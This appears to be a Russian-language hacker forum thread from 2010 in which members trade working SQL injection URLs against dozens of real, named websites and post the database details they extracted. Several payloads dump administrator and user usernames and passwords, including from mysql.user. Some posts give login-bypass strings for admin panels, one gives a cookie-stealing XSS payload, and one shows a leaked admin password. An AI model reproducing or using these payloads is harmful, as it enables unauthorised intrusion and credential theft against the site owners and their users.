User: westcomp1@localhost
Database: db_westcomp1
Version: 5.0.51a-community
Как вам сайтик? ;)
jecka3000
25.03.2010, 01:11
PR 6
http://www.pelamiswave.com/news.php?id=26&categoryId=-3+union+select+1,2,3,4,5,6,7,8,concat(username,0x2 0,password),10,11,12,13,14,15,16,17+from+cmsUsers--
5.0.68
pelamiswave.com@localhost
pelamiswave_com
DezMond™
25.03.2010, 12:58
www.foxclub.ru 6k юзеров зарегено
http://www.foxclub.ru/api/api.php?act=list&kat=-4'+union+select+1,2,3,concat_Ws(0x3a3a,username,pa ssword,email,admin)+from+ph515_users+--+
http://forum.foxclub.ru/login.php
http://forum.foxclub.ru/admin.php
http://www.foxclub.ru/imgal/login.php?referer=admin.php
jecka3000
25.03.2010, 13:48
официальный сервер Казахстана
ТИц 275
PR 4
http://www.kazakh.ru/photo/view.phtml?id=-573+union+select+1,2,3,4,concat(nikname,0x20,nikpa ss,0x20,admin_ok,,0x20,admin_nikkazakhemailyes),6, 7,8,9,10+FROM+nik--
root_sashok
25.03.2010, 14:36
http://www.pertechresources.com/products/catalog.php?product=48+union+select+1,unhex(hex(co ncat_ws(0x3a,user(),database(),version()))),3,4,5, 6,7,8--
User: pertech@eastman.dreamhost.com
Database: pertech
Version: 4.1.14-Debian_5-log
http://www.dataman.nl/site/base.php?lang=nl&cat_id=1+union+select+1,concat_ws(0x3a,user(),data base(),version()),3,4,5,6,7,8,9,10,11--
User: dbuser@localhost
Database: dataman
Version: 4.1.20
jecka3000
25.03.2010, 15:15
http://www.navanac.ie/pages.php?id=-2+union+select+concat(version(),0x20,user(),0x20,d atabase())--
5.0.89-log
c3po_3@209.68.2.22
c3po_alba
http://www.sonistics.com/pages.php?id=-6+union+select+1,concat(version(),user(),database( ))--
5.0.67-community
sonistic_db@localhost
sonistic_db
http://www.thereddstone.com/pages.php?id=-3+and+1=2+union+select+1,concat(version(),0x20,use r(),0x20,database()),3,4--
5.0.32-Debian_7etch11-log
thereddsto215406@localhost
phpmy1_thereddstone_com
http://www.rhinossoccer.com/pages.php?id=-23+union+select+1,2,3,concat(username,0x20,lastnam e,0x20,permissions),5,6,7,8,9,10,11+from+admins--
http://www.inf-fni.org/pages.php?id=-7+union+select+1,2,3,4,concat(username,0x20,passwo rd),6,7,8,9,10,11,12+from+administrator--
root_sashok
25.03.2010, 15:42
http://why2.org/listings/index.php?c=5&s1=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version())--
User: why2org_why2_db@localhost
Database: why2org_why2_db
Version: 5.0.89-community
http://www.casa-nova-bucalo.de/index.php?page_id=7+union+select+concat_ws(0x3a,us er(),database(),version())--
User: sismedia@localhost
Database: 10402_sismedia
Version: 4.1.22
CyberHunter
25.03.2010, 16:51
http://www.morehate.com/bands.php?id=-34+union+select+1,2,3,4+--+
Version: 4.1.25-log
User: morehat1_karalez@localhost
Database: morehat1_morehate
http://www.ledohod.com.ua/index.php?id=-34'+union+select+1,2,3,4,5,6+--+
Version: 5.0.89-community-log
User:
ledohodc_ledohod@localhost
Database:
ledohodc_ledohod
root_sashok
25.03.2010, 18:03
http://www.gtk.fi/slr/author.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),dat abase(),version()),7,8--
User: slr@localhost
Database: slr
Version: 5.0.77,7
http://www.r2.com.au/software.php?page=2&show=hideoe'+union+select+1,concat_ws(0x3a,user(), database(),version()),3,4,5+--+
root_sashok
25.03.2010, 19:47
http://www.stevenalan.com/product.php?defvarid=1666&productid=16316&cat=933&manufacturerid=1+union+select+concat_ws(0x3a,user( ),database(),version())--
User: stevenshop@localhost
Database: steven_shop
Version: 4.1.22-standard-log
http://blacknetdaily.com/index.php?p=read&a=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19--
User: bndaily@72.167.131.53
Database: bndaily
Version: 4.1.22-max-log
http://www.macdirectory.com/index.php?option=com_software&task=viewDetail&software_id=-1+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,V ersion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0 x7873716C696E6A656E64)-- -
Database Version: 5.0.86
System User: macdirect@localhost
Host Name: server.macdirectory.com
Installation dir: /usr/
DB User: 'macdirect'@'localhost'
Базы: information_schema
macdirect_ad
macdirect_db
test
Система: Joomla
PR 5
ТиЦ 10
http://www.i-eye.no/liste.php?id=-6%20UNION%20SELECT%201,2,3,4,5,6,7,concat_ws%280x3 a,user%28%29,%20database%28%29,version%28%29%29,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20--+
User: ieye_user@localhost
Database: ieye_ieye
Version: 4.1.22-standard
root_sashok
26.03.2010, 01:18
http://www.cbdc.ca/stories.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version())--
User: web6u1@localhost
Database: web6db1
Version: 5.0.7
PR 5.
http://www.fotoskaitmena.lt/content.php?id=66+union+select+concat_ws(0x3a,1111 1,user(),database(),version())--
User: dwk@localhost
Database: dwk
Version: 5.0.45
11111 в данном случае не несет никакой информации, но помогает вывести User'a.
Strilo4ka
26.03.2010, 08:45
http://www.zeturija.lt/microcms-admin-home.php
admin" or "admin"="admin" /*
пасс любой
http://www.bistroboheme.se/microcms-admin-home.php
admin" or "admin"="admin" /*
пасс любой
root_sashok
26.03.2010, 19:43
http://www.stnicholashospital.org/providers/provider_info.php?pp=142+union+select+1,2,3,4,5,6, 7,8,9,10,11,concat_ws(0x3a,user(),database(),versi on()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38+--+
User: stnick_cat@localhost
Database: stnick_catalog
Version: 5.0.89-community-log
PR 5.
http://der-antiaggressionstrainer.com/galerie/view.php?id=2+union+select+1,2,concat_ws(0x3a,user (),database(),version()),4,5,6,7,8,9,10,11,12,13,1 4--
User: patrik@localhost
Database: galerie
Version: 5.0.45
http://masfan.com/index.php?component=ecommerce&action=view&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,concat_ws(0x3a,user(),database(),version()),18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
Красивый сайт с кучей полей.
User: masfanс_masfan@localhost
Database: masfanс_masfan
Version: 5.0.89-community-log
http://cmx.ubi.com/viewpgn.php?gameid=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version())--
Смотрите-ка, что я нашел. За ваши дальнейшие действия не отвечаю... Хотя, таблицы достать нельзя. Не знаю, что вам там в голову придет. Так, запостил для информации.
User: cmxdb@cmt4.web.mdc.ubisoft.com
Database: cmx
Version: 5.0.45-log
http://dragobarzini.com/query.php?vote=-4+and+1=0+union+select+1,concat(username,char(58), password),3+from+admin
user() : dragobar_votes@localhost
version() : 5.0.89-community-log
database() : dragobar_votes
http://www.tnak.am/sub/opros.php?quest_id=34+and+1=0+union+select+1,2,3
user() : tnakam_hvh13@localhost
version() : 5.0.89-community
database() : tnakam_tnaks
http://knockonmydoor.com/wholesale/newsletter.php?id=1
сайт мего крутой корпорации :)
целый день убил ради сс и х*й :mad:
Host IP: 66.117.14.58
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL unknown ver
Current DB: knocko7_newe
http://knockonmydoor.com/wholesale/newsletter.php?id=1+and+1=0+union+select+1,2,3,4,5 ,6,7,8--
:)
root_sashok
27.03.2010, 01:54
http://www.mondialisations.org/php/public/liste.php?r=558+union+select+concat_ws(0x3a,user() ,database(),version()),2--
Username: mondial@localhost
Database: mondial
Version: 4.1.20
http://www.stpatricks.org.au/printpage.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version())--
Username: stpats@localhost
Database: stpats
Version: 5.0.32-Debian_7etch5-lo
Title. Есть users.
http://calendar.templemenorahmiami.org/eventdisplay.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2,3--
Username: dbo292889623@74.208.16.212
Database: db292889623
Version: 5.0.81-log
http://swim.wellsreserve.org/stories.php?id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,us er(),database(),version()))),6,7,8,9--
Username: srichardson@soy.dreamhost.com
Database: anguilla
Version: 4.1.16-standard-log
http://www.healthaccessproject.org/vpn_output.php?practice=-1+union+select+unhex(hex(concat_ws(0x3a,user(),dat abase(),version()))),2--
Username: healthaccess@tuna5.xmission.com
Database: healthaccess
Version: 4.1.11-Debian_4sarge8-log
KENT1994, чтобы не терли посты — приводи инъекцию в нормальный вид. После ID дописывай количество колонок. В начале темы написано.
CyberHunter
27.03.2010, 15:08
http://cpod.org.au/page.php?id=-144+union+select+1,2,3,4,5,6,7,8+--+
Version: 5.0.45
User: CBAA@localhost
Database: cbaa
http://mora.am/products.php?category=3+union+select+1,2,3,4,5,6,c oncat(user(),version(),database()),8+from+informat ion_schema.tables
user() : tiensam@localhost
version() : 5.0.89-community
database() : tiensam_mora
CyberHunter
27.03.2010, 18:04
http://www.huntersearch.com.au/entertainment.php?id=-144+union+select+1,2,convert%28version%28%29+using +latin1%29,4+--+
Version: 5.0.16-max-log
User: w2768@localhost
Database: huntersearch_com_au_huntersearch
http://www.drchaiyot.com/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat%28id,0x3a,username,0 x3a,password%29,3,4+from+user
http://www.mondorecords.com/shop.php?id=276+UNION/**/SELECT/**/1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F 2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E 6A656E64),3,4,5,6,7,8,9,10,11/**/LIMIT/**/1,1--
xsqlinjbegin4.0.27-standard
db124719782
dbo124719782@local
http://www.orchardcentral.com.sg/shop.php?id=-211+UNION+SELECT+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16--
orchard_usr@localhost
orchardcentral_db
5.0.45
BrainDeaD
27.03.2010, 19:57
китайский PR 5
http://rjb.bjtu.edu.cn/show.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8,9%20--
database: rjbdb
version: 5.0.24a-community-nt
user: root@localhost
http://chelhouse.ru/ipoteka/show_law.php?id=-1%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29 ,database%28%29,version%28%29%29,3,4%20--+
User: 3wuralpress@localhost
Datebase: upi
Version: 5.0.70-log
http://www.miwatson-electric.ltd.uk/gallery.php?id=1&imgid=-1%20UNION%20SELECT%201,concat_ws%280x3a,database%2 8%29,version%28%29,user%28%29%29%20--+
User: miwatson_www@localhost
Datebase: miwatson_www
Version: 5.0.89-community-log
http://www.kromestudios.com/games/overview.php?id=-1%20UNION%20SELECT%201,2,3,4,concat_ws%280x3a,data base%28%29,version%28%29,user%28%29%29,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22%20%20--+
User: root@localhost
Datebase: logkromeweb2
Version: 5.0.45
http://www.aed.am/program.php?prog=136+and+1=0+union+select+1,2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
user() : root@localhost
version() : 5.0.51a-24+lenny3
database() : aed_website
--------------------------------------
есть таблица users
p.s. Так и не нашёл админку...
сайт ОПУС ДЕИ личная прелатура ватикана,та самая о которой писал Дэн Браун в "Коде Да Винчи"
http://www.opusdei.us/ssec.php?a=1932%27+and+substring%28@@version,1,1%2 9=5+--+
http://www.fibel-gastro.de/saarland/archiv.php?p=gallery&id=-2+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10,11--
User: dbo282976108@212.227.29.178
Database: db282976108
Version: 5.0.81-log
http://zhigach.com/blog_show.php?id=1+union+select+1,2,concat_ws(0x3a ,user(),database(),version()),4,5,6--
User: gb_x_zhigach@10.0.1.42
Database: gb_x_zhigach
Version: 5.0.70-log
http://store-apple.ru/goods.htm?parent_id=-56+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(), database(),version()),8,9,10,11,12,13,14,15--
User: itbala_alex@localhost
Database: itbala_iphonezakaz
Version: 5.0.89-community
http://www.toshiba-klima.at/produkt/artikel.php?id=420+union+select+1,2,3,4,5,6,7,8,9, 10,11,concat_ws(0x3a,user(),database(),version()), 13,14,15,16,17,18,19--&lang=2
User: root@localhost
Database: aircond
Version: 5.0.45
PR4
nemaniak
28.03.2010, 01:37
border.se PR-5
http://www.border.se/Search.php?searchtext=IVELAND KARI&select=artist+union+select+1,2,concat_ws(0x3a,vers ion(),user(),database()),4,5,6,7,8,9,10,11,12,13,1 4+--+
5.1.38-community:bordermusic@localhost:bordermusic
svedab.se PR-4
http://www.svedab.se/sida.php?sid=2&usid=-8%27+union+select+1,2,3,concat_ws%280x3a,version%2 8%29,user%28%29,database%28%29%29,5,6,7,8,9,10,11, 12,13,14,15,16,17+--+
5.0.67:u5943590@www19.aname.net:u5943590_1
http://www.fotomundo.com/nota.php?id=1147+union+select+1,2,3,4,concat_ws(0x 3a,user(),database(),version()),6,7,8,9,10,11,12,1 3,14,15--
User: fotomundo.com@localhost
Database: fotomundo_com
Version: 5.0.77
PR5
jecka3000
28.03.2010, 02:21
machinz.co.uk
вся инфа в исходном коде страницы
http://www.machinz.co.uk/Productview.php?product=-2+and+1=2+union+select+1,concat(Username,0x20,Pass word,0x20,Email)+from+LoginUsers--
jagz.co.uk
http://www.jagz.co.uk/menu.php?CategoryID=-9+union+select+1,2,concat(AdminName,0x20,AdminPwd) ,4,5,6,7,8,9+from+Admin--
biblios.pijnenburg.it
http://biblios.pijnenburg.it/title.php?param=-1547+union+select+1,2,3,4,concat(username,0x20,pas sword),6,7,8,9,10,11+from+tblUser--
www.vivliokritiki.gr
http://www.vivliokritiki.gr/title.php?id=-6+union+select+1,concat(email,0x20,password),3,4,5 ,6,7,8,9,10,11,12+from+users--
jetproducts.co.uk
в исходном коде
http://www.jetproducts.co.uk/details.php?prod_id=-159+union+select+1,concat(username,0x20,password,0 x20,email),3,4+from+zebra_admin--
istitutocam.com
http://www.istitutocam.com/pagina-istituto-cam.php?id=-3+union+select+1,2,concat(username,0x20,password,0 x20,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+from+clienti--
www.liveview.cz
http://www.liveview.cz/cam.php?id=-31+union+select+1,concat(login,0x20,pwd)+from+lv_u sers--
admin;qweasd
salesbearing.com
вывод в тайтле
http://www.salesbearing.com/products/product.php?id=-31+union+select+1,concat(username,0x20,pwd),3,4+fr om+admin--
moretonisland.com.au
http://www.moretonisland.com.au/product.php?id=-67753+union+select+1,2,concat(username,0x20,passwo rd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30+from+customers--
edra.com
http://www.edra.com/product.php?id=-42+union+select+1,2,3,4,5,concat(user(),0x20,datab ase(),0x20,version()),7,8,9,10,11,12,13,14,15,16,1 7,18--
http://www.kras-ru.1gb.ru/action.php?action=plugin&name=gallery&type=album&id=-5+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10--
User: 1gb_kras@10.0.2.3
Database: 1gb_kras
Version: 5.0.51a-community-nt-log
http://expozice.sternberk.cz/ClankyPodrobnosti.php?id=87+union+select+1,2,3,4,c oncat_ws(0x3a,user(),database(),version()),6,7,8,9--&typ=aktualne
User: expozice_casu@localhost
Database: expozice_casu
Version: 4.0.18-max-debug
http://www.esend.su/index.php?mode=user_message_details&id=106823+union+select+1,2,3,concat_ws(0x3a,user() ,database(),version()),5,6,7,8,9,10,11,12,13,14,15 ,16,17,18--&page=&rows=&owner=&for_time=31&cost1=&cost2=&object=®ion=&thing=&number=&phone_avail=&mebel_avail=&refrigerator_avail=&tv_avail=&street=
User: send@localhost
Database: esend
Version: 5.0.32-Debian_7etch12-log
http://www.che-esche.com/fullafisha.php?id=53+union+select+1,2,3,4,concat_w s(0x3a,user(),database(),version()),6,7,8--
User: cheesche_cheewe2@localhost
Database: cheesche_cheesche
Version: 5.0.77-log
http://demo.xbtit.com/index.php?page=torrents&active=2&order=speed+or(1,1)=(select+count(0),concat((selec t+database()+from+information_schema.tables+limit+ 0,1),floor(rand(0)*2))from(information_schema.tabl es)group+by+2)--++&by=ASC
на этом сайте уже было, но в другом месте.
http://www.nutricia.pl/kartki_galeria.php?A=SCHOW_ID&pid=-4671+union+select+1,concat(loginname,char(58),pass word)+from+cmslist_admin--
user() : nutricia@192.168.27.17
version() : 5.0.84
database() : nutricia
nutrica.pl/cms
nutrica.pl/admin
admin : phplist (в админу не входит).... ????
http://www.seacsub.com/product.php?ID=679+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,concat_ws(0x3a,user(),database(),version()),29 ,30,31,32,33,34,35--
User: seacsub07@localhost
Database: seacsub_com
Version: 5.0.45
PR4
https://www.greatcanadianholidays.com/greatcanadianholidays/myweb.php?hls=10007&id=30696+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,un hex(hex(concat_ws(0x3a,user(),database(),version() ))),47,48,49,50,51--
User: gchc_plujo@localhost
Database: MYwebPHP-great
Version: 4.1.10a
http://etweb.gazettenet.com/web/gateway.php?query=VenueEvents&site=default&tpl=cm_VenueSchedule&ID=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,co ncat_ws(0x3a,user(),database(),version()),13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,8 2,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98, 99,100,101,102,103,104,105,106,107,108,109,110,111 ,112,113,114,115,116,117,118,119,120,121,122,123,1 24,125,126,127,128,129,130,131,132,133,134,135,136 ,137,138,139,140,141,142,143,144,145,146,147,148,1 49,150,151,152,153,154,155,156,157,158,159,160,161 ,162,163,164,165,166,167,168,169,170,171,172,173,1 74,175,176,177,178,179,180,181,182,183,184,185,186 ,187,188,189,190,191,192,193,194,195,196,197,198,1 99,200,201,202,203,204,205,206,207,208,209,210,211 ,212,213,214,215,216,217,218,219,220,221,222,223,2 24,225,226,227,228,229,230,231,232,233,234,235,236 ,237,238,239,240,241,242,243,244,245,246,247,248,2 49,250,251,252,253,254,255,256,257,258,259,260,261 ,262,263,264,265,266,267,268,269,270,271,272,273,2 74,275,276,277,278,279,280,281,282,283,284,285,286 ,287,288,289,290,291,292,293,294,295,296,297,298,2 99,300,301,302,303,304,305,306,307,308,309,310,311 ,312,313,314,315,316,317,318,319,320,321,322,323,3 24,325,326,327,328,329,330,331,332,333,334,335,336 ,337,338,339,340,341,342,343,344,345,346,347,348,3 49,350,351,352,353,354,355,356,357,358,359,360,361 ,362,363,364,365,366,367,368,369,370,371,372,373,3 74,375,376,377,378,379,380,381,382,383,384,385,386 ,387,388,389,390,391,392,393,394,395,396,397,398,3 99,400,401,402,403,404,405,406,407,408,409,410,411 ,412,413,414,415,416,417,418,419,420,421,422,423,4 24,425,426,427,428,429,430,431,432,433,434,435,436 ,437,438,439,440,441,442,443,444,445,446,447,448,4 49,450,451,452,453,454,455,456,457,458,459,460,461 ,462,463,464,465,466,467,468,469,470,471,472,473,4 74,475,476,477,478,479,480,481,482,483,484,485,486 ,487,488,489,490,491,492,493,494,495,496,497,498,4 99,500,501,502,503,504,505,506,507,508,509,510,511 ,512,513,514,515,516,517,518,519,520,521,522,523,5 24,525,526,527,528,529,530,531,532,533,534,535,536 ,537,538,539,540,541,542,543,544,545,546,547,548,5 49,550,551--
551 колонка
User: appetweb@host-25-188.coresecure.net
Database: etweb
Version: 4.1.22-log
http://www.sanmebel.ru/seriya.php?ser=-80+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19--
User: sanmebel@bux.hc.ru
Database: wwwsanmebelru
Version: 4.0.25
jecka3000
28.03.2010, 15:55
interplay.com
http://www.interplay.com/games/support.php?id=-120+union+select+1,concat(version(),0x20,database( ),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19--
retailtherapy.tv
http://www.retailtherapy.tv/video.php?id=-163+union+select+1,2,3,concat(version(),0x20,user( ),0x20,database()),5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19--
upbulk.com
http://www.upbulk.com/video.php?id=1517+and+1=2+union+select+1,concat(na me,0x20,password,0x20),3,4,5,6,7,8,9+from+user--
filmdeculte.com
http://archive.filmdeculte.com/video/video.php?id=-73+union+select+concat(version(),0x20,database(),0 x20,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22--
bloggingheads.tv
вывод в самой же адресной строке О-o
http://bloggingheads.tv/video.php?id=231&cid=-1214+union+select+concat(username,0x20,password),2 ,3+from+user--
thaipods.com
http://www.thaipods.com/video.php?id=-93026211+union+select+1,concat(Name,0x20,Password, 0x20,Email),3,4,5,6,7,8+from+Login--
http://vertu-shop.net/news.php?id=16%20UNION%20SELECT%201,CONCAT(Version (),Database(),User()),3,4,5,6%20LIMIT%201,1--
Database Version: 5.0.89-community-log
Database name: arslan3_vertushop
User name: arslan3@localhost
http://www.snseurope.com/snslink/news/news-full.php?id=14142/**/UNION/**/SELECT/**/CONCAT(Version(),Database(),User()),2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20/**/LIMIT/**/1,1--
Database Version: 5.0.89-community-log
Database name: arslan3_vertushop
User name: arslan3@localhost
http://www.gardenorganic.org.uk/research/news/story.php?id=1025%20UNION%20SELECT%20CONCAT(0x7873 716C696E6A626567696E,Version(),0x2F2A2A2F,Database (),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4 ,5,6,7,8,9,10,11,12,13%20LIMIT%201,1--
http://www.cbdc.ca/stories.php?id=-26+union+select+1,concat_ws(0x3a,user(),database() ,version())--&rid=34
//этот сайт уже был, но скуля была в другом месте
User: web6u1@localhost
Database: web6db1
Version: 5.0.77
PR5
http://www.cloudynights.com/category.php?category_id=-2+union+select+1,2,3,4,5,concat_ws(0x3a,user(),dat abase(),version()),7,8,9,10,11,12,13,14,15,16,17,1 8,19--
//этот так же
User: asaint_6@216.92.192.94
Database: asaint_cloudynights
Version: 4.1.22-log
PR6
http://www.essti.com/products.php?ser=-69+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12--&ser1=L3
User: essti-1@209.235.156.35
Database: essti-1
Version: 4.1.22-standard
PR:4
http://www.camp.ru/cat.php?rg=63&id=-30+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,concat_ws(0x3a,version(),u ser(),database()),41,42--&lst=12
User: tarkon_user@localhost
Database: tarkon_camp
Version: 4.1.22-log
PR: 3
BrainDeaD
28.03.2010, 19:07
http://www.themetalcircus.com/concierto.php?id=-664+union+select+1,concat_ws(0x3a,database(),versi on(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26%20--database: CIRCUS4
version: 4.1.22
user: THEMETAL_ROOT2@LOCALHOST
http://www.cobkom.ru/news/more.php?CategoryID=1%27&id=18+union+select+1,version%28%29,3,database%28%2 9,5,user%28%29,7%20--
version:4.1.25-log
database:sovkomr4_sovcom
user:sovkomr4_sovkomr@localhost
http://www.gps-perimeter.nl/index.php?action=text&id=-663+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--
User: alfabit_gps@nl15.yourname.nl
Database: alfabit_gps
Version: 5.0.51a-community
http://www.zamek.poznan.pl/index.php?k=2&s=-162+union+select+1,2,3,4,5,6,7,8--
user() : zamekpl_zamek@neptun.az.pl
version() : 5.1.45-log
database() : zamekpl_zamek
+Пассив XSS
http://www.zamek.poznan.pl/index.php?k=2&s=-162+union+select+<script>alert(document.cookie)</script>,2,3,4,5,6,7,8--
http://fragoria.mail.ru/info.php?Id=219+UNION+SELECT+CONCAT(0x3a,Version() ,0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x3a)--
Version: 5.0.51a-log
Database: sky03
User: sk61284@localhost
http://masfan.com/index.php?component=ecommerce&action=view&id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,concat_ws(0x3a,user(),database(),version()) ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4--&seccion=
User: MASFANC_MASFAN@LOCALHOST
Database: MASFANC_MASFAN
Version: 5.0.89-COMMUNITY-LOG
jecka3000
29.03.2010, 00:45
http://www.opentopia.com/showcam.php?camid=-1487+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,concat(user,0x20,password),22+f rom+mysql.user--
http://www.weatherusa.net/skycamnet/showcam.php?state=Pennsylvania&id=-10+union+select+1,2,concat(admin,0x20,admin_pw),4, 5,6,7+from+phpads_config--
http://www.draytek.com/user/SupportAppnotesDetail.php?ID=-102+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9--
User: draytekdb_user@localhost
Database: draytekdb
Version: 5.0.67-log
PR5
http://www.jsv-überlingen.de/photo_galerie/view.php?id=164+union+select+1,concat_ws(0x3a,user (),database(),version()),3,4,5,6,7,8,9,10,11,12,13 ,14--&categorie=24&next=1
User: d0045c25@localhost
Database: d0045c25
Version: 4.1.22-max-log
http://www.salonitalia.ru/album/scripts/show_single.php?id=-1+union+select+1,2,3,4,5,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29+--+
User: salonitalia@localhost
Database: db_salonitalia
Version: 5.0.51a-community
http://www.rws-e.de/php/galerie/view.php?id=8+union+select+1,concat_ws(0x3a,user() ,database(),version()),3,4,5,6,7,8,9,10,11,12,13,1 4--&next=1&categorie=3
User: d00b2d43@localhost
Database: d00b2d43
Version: 4.0.25-Max-log
http://nasi-krewni.pl/index.php/users/view?id=kozak23&cid=2&album_id=27+union+select+1,2,3,concat_ws(0x3a,user (),database(),version()),5,6--
User: nasi_krewni4@localhost
Database: nasi_krewni4
Version: 5.0.66a-log
http://www.fibel-gastro.de/saarland/archiv.php?p=gallery&id=2+union+select+1,2,3,concat_ws(0x3a,user(),data base(),version()),5,6,7,8,9,10,11--
User: dbo282976108@212.227.29.178
Database: db282976108
Version: 5.0.81-log
http://green-sib.ru/design_view.php?id=-1 UNION SELECT 1,concat_ws(0x3a,user(),database(),version()),3,4, 5,6 --+
User: greenwi1_greenwi@localhost
Database: greenwi1_gr
Version: 4.1.25-log
-=Razor=-
29.03.2010, 16:04
http://www.interfilm.de/festival2005/filme-a-z.php?id=-1+union+select+1,version()/*
Version: 4.0.27-max-log
http://www.010travel.com/zhuanti.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,versi on(),15,16,17,18--
Version: 5.0.45-community-nt
http://www.modi88.com/za.php?id=-1+union+select+1,Concat(user,0x3a,pass)+from+coadm in--
Version: 5.0.82-log
http://www.jewelrykorea.net/ko/zg.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37--
version: 4.0.22-log
ttp://www.onceok.com.tw/festival.php?id=-1%27+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14/*
Version: 5.0.27
Онлайн магазин
http://www.kvazar.ru/price_new.htm?group_id=-24+union+select+1,2,version(),4,5,6,7--
version: 5.0.45
table: user
http://australia.daizybabies.com/shop_item.php?id=1+UNION+SELECT+1,2,3,4,concat_ws( 0x3a,user(),database(),version()),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9--
User: panales_adminAU@localhost
Database: panales_nappiesAU
Version: 5.0.89-community
http://www.a-music.ru/bytopic.php?id=1+union+select+1,2,concat_ws(0x3a,u ser(),database(),version()),4,5,6--&brand=1
User: amusic@fhe.hoster.ru
Database: amusic
Version: 4.0.27-log
http://kingmotors.ru/makeorder.php?id=-1%27+union+select+1,concat_ws%280x3a,user%28%29,da tabase%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23+--+
User: kingmotors_king@localhost
Database: kingmotors_king
Version: 4.1.22-lk-log
http://www.brewerconsulting.co.uk/cases/case.php?id=-6074+union+select+1,2,group_concat(schema_name),4, 5,6,7,8,9,10,11+from+information_schema.schemata--
jecka3000
29.03.2010, 19:30
http://www.eurofm.org/news.php?id=-94+union+select+1,concat(version(),0x20,database() ,0x20,user()),3,4,5--
5.0.51a-community
euro_test
euro@localhost
http://www.bookjobs.com/page.php?prmID=-8+union+select+concat(user,0x20,password)+from+mys ql.user--
4.1.20
aap
root@localhost
http://www.nowt2do.co.uk/review.php?id=-545+union+select+concat(version(),0x20,database(), 0x20,user()),2--
5.0.90-community
nowt2do_nowt2do
nowt2do@localhost:
http://www.ligali.org/review.php?id=-31+union+select+1,2,concat(version(),0x20,database (),0x20,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 ,51,52,53,54,55,56,57,58,59,60,61,62--
5.0.27-community-nt
ligali_org_2
ligali_org@localhost
